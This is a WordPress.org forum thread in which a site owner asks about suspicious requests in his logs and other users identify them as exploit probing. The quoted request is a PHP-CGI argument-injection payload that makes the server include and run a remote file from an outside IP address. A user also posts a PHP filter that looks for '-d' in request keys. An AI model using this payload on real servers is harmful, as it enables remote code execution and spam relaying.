WordPress.org

Ready to get started?Download WordPress

Forums

Possible hack attempts? Strange links to my site (7 posts)

  1. Treebeard
    Member
    Posted 2 years ago #

    I am seeing some strange links that look like possible hack attempts in my visitor logs, and was wondering what they mean. The look like this:

    /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+
    -dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_
    prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt

    Anyone know what that is?

  2. Looks like someone's testing for possible exploits.

  3. Treebeard
    Member
    Posted 2 years ago #

    lovely... thanks for getting back to me on that. wonder if they found any! LOL! they've visited with this url over 300 times already. really annoying..

  4. Daniel Haim
    Member
    Posted 2 years ago #

    Definitely.

  5. Unlikely, but yeah, it's annoying as hell.

    I cranked my firewall up to block people with 75 connections within 60 seconds.

  6. Treebeard
    Member
    Posted 2 years ago #

    I don't know how to do that. I have Better WP Security installed, but had to disable it (memory errors).

  7. jwcieply
    Member
    Posted 2 years ago #

    I just started seeing the same code and this code will send spam from my server. This was the only post I found concerning this and google search was no help. I fixed it by added the following code to index.php:

    foreach ($_REQUEST as $key=>$value) {
            if (preg_match("/\-d/",$key)) {
                    unset($_REQUEST);
                    unset($_GET);
                    unset($_POST);
            }
    }

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.